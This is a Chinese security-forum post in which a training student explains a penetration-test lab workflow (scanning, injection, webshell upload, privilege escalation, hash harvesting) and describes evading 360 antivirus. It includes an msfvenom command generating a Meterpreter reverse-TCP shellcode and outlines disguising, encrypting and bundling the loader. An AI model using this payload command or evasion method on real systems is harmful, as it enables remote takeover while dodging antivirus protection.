安全矩阵

 找回密码
 立即注册
搜索
查看: 2461|回复: 0

完整渗透流程原理讲解与MSF免杀360

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-7-9 09:18:31 | 显示全部楼层 |阅读模式
原文链接:完整渗透流程原理讲解与MSF免杀360

完整渗透流程原理讲解与MSF免杀360

以下是学员小苏自学三个月的一些心得,希望能帮助某些想入门的人
这篇主要对于零基础刚开始进行项目的朋友一个讲解帮助,第二部分免杀主要为思路讲解。上一篇文章 零基础学习渗透过程
   首先我们看月老师这里的项目开始进行局域网存活主机扫描,很多刚入门的朋友可能有些不理解这一步,其实就是确认目标,因为你是在本地做的靶机项目进行渗透,而每个靶机都有自己的IP地址,方便我们找到并绑定host。

第二步,进行端口扫描,为什么进行端口扫描,首先你学基础知识就会知道每个端口对应每个服务,你可以理解端口就是一个门,每个门后边都通往同一个地方(也就是服务器),我们就是要从这些不同的门找到突破点进入到最后的同一个地方(这里解释主要针对项目四典型渗透,更多的域渗透等内网渗透,可以报名月老师培训学习

第三步,访问每个端口进行信息收集,你作为初学者,首先要把基础打好,知道每个端口的服务相对应的是什么,你利用工具探测出每个端口对应的信息后,他告诉你这个端口是http或者ssh服务等,你得先知道如何去访问进行收集信息,一定要去自己慢慢摸索,从每个端口的信息获得有用的数据进行渗透。(下图为暗月项目四两个端口服务)


第四步,入侵打点,简单点打点百分之七十为信息收集最后百分之三十才是漏洞入侵测试,这里主要针对项目四进行讲解,先收集这个站的相关信息:指纹识别,目录扫描,子域名搜集等。之后进行弱口令爆破,这个主要碰运气

第五步,实施渗透,这时候就要利用前边收集的信息了,组件框架版本,cms类型,oa类型这一类信息,看是否有可利用的漏洞能直接getshell,常见三个拿shell方法,注入,文件上传,命令执行渗透是一个站一个情况没法统一说明,这里拿项目四做例子利用注入进入后台,上传文件拿到shell


第六步,提升权限这里Windows与Linux提权这里不详细讲了大家可以搜搜百度进行了解,这里项目四是利用msf反弹shell,利用exp进行的提权。

第七步,内网渗透进行内网的信息收集,hash,路由信息,用户组等,进行进一步的渗透,这里希望刚入门的朋友不要管太多的名词,说白了就是搜查信息看看这个服务器还连接了其他服务器没,之后可以利用这个服务器是否被另一个服务器的用户组登陆过,可以做票据等进行访问登录,这里项目四信息收集主要就是用户名与密码的收集,因为再次渗透另一个服务器的时候依旧和开始打第一个服务器流程一样(横向域渗透等报名暗月学习)。下图为项目四收集到的hash之后进行破解密码。

再来一遍渗透操作获取权限拿到flag


内网渗透这里我没法做更多的解析,因为我也还没学太懂,毕竟月老师项目想掌握还是需要时间的。
下边简单讲下最近刚成功的MSF源码免杀过360上线
首先生成payload文件

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcpLHOST=ip LPORT=port-f c > shellcode.c

创建控制台程序,下图是已经编辑好把code放进去的源码了,加载器没有用老师给的深层次源码,加载器源码就不漏了我还年轻还不想搞事,原理其实是先进行注入正常伪文件进行源码的修改(例如单一图标等),正常文件代码作为“掩护”再进行一些正常文件的捆绑压缩,自解压至/tmp隐藏文件免杀(关键在于加载器源码的处理,这里我的个人简单理解其实就是当运行一个正常文件的exe他进行的一些访问是被杀软允许的,我把codehttp形式访问反弹,进行code加密,之后在设置程序要用管理员权限执行免掉一些确认操作实施免杀,这里我免杀理解还是有些朦胧毕竟学的还不是很深,临时过个360上线)。这里就简单的单个exe文件作为演示了

这里运行库要改成多线程

生成解决方案

好了来看看生成的exe爆毒否,先看好没任何添加信任。

来360检测不爆红

我的msf也准备好了

运行上线

最后检测了一下,一般般吧毕竟还属于半成品状态,别问我别找我,这技术都是和暗月学的,源码学习找暗月



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 08:40 , Processed in 0.012807 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表